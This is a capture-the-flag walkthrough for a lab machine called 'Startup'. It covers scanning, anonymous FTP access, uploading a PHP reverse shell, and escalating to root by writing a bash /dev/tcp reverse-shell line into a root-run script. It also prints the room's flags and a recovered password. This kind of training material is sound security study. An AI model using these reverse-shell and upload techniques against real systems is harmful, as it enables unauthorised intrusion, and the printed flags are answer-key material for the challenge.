We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!
Information
Room: Startup
Difficulty: Medium
Best to use a Kali Virtual Machine as all tools are installed.
Walkthrough
- Identifying Vulnerabilities & Reverse Shell
First, we need to identify the vulnerabilities on the server. We can look for open ports with nmap:
nmap -sV -Pn 10.10.197.1
The following ports are open:
Now, we can try and log into the ftp server by using anonymous/anonymous as authentication.
ftp 10.10.197.1
After being logged in, we can list the current directory and the download the files:
get notice.txt
get important.jpg
Since there’s nothing left, we can close the connection for now. Next, we can try the http port:
gobuster dir -u http://10.10.197.1 -w /usr/share/wordlists/dirb/common.txt
The contents of the /files directory, is the same as the one in the FTP. We can load a reverse php shell and open it in our terminal:
cp /usr/share/webshells/php/php-reverse-shell.php .
#change IP value to machine's value
ftp 10.10.197.1
#enter credentials
cd ftp
put php-reverse-shell.php
#exit
nc -lvnp 1234
Then we can exit, and open the files /php-reverse-shell.php file in a web browser. Normally, the netcat shell should start.
1. What is the secret spicy soup recipe?
Once we are in the reverse shell, the current directory contains a file called ‘recipe.txt’.
cat recipe.txt
Answer: Love
2. What are the contents of user.txt?
So far we don’t have the permissions to explore the filesystem. If we look at the directory again, there is another folder owned by the same user as ‘recipe.txt’:
Inside this folder is a pcap file called ‘suspicious.pcapng’. Just using ‘grep password’ suscpicious.pcapng returns a match. We can find out the credentials by using xxd:
xxd -c 40 suspicious.pcapng | grep -i password -A 10
We have a password. We can try to log in as www-data. First, we need to spawn a shell with python, then we can try and log in as a user:
python3 -c 'import pty; pty.spawn("/bin/sh")'
su www-data #fails
su lennie
#password c4ntg3t3n0ughsp1c3
cd /home/lennie
Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
3. What are the contents of root.txt?
Whilst we are still in Lennie’s user directory, we can see that he has a folder called ‘scripts‘. Inside that folders are two files. We can print them to see what they are used for:
cat scripts/*
The file planner.sh is owned by root, and when executed it executes another file /etc/print.sh. This file is owned by lennie. We can try to modify the /etc/print.sh file, and get a reverse shell which will send us to root:
echo 'bash -i >& /dev/tcp/10.9.1.162/5678 0>&1' > /etc/print.sh
#In your Machine:
nc -lvnp 5678
And … Here’s the flag !
Answer: THM{f963aaa6a430f210222158ae15c3d76d}
TLDR
– This is a good machine for absolute beginners.
– Use NMAP to view open ports.
– Upload a reverse-shell via ftp
– Privilege escalation via Permissions!
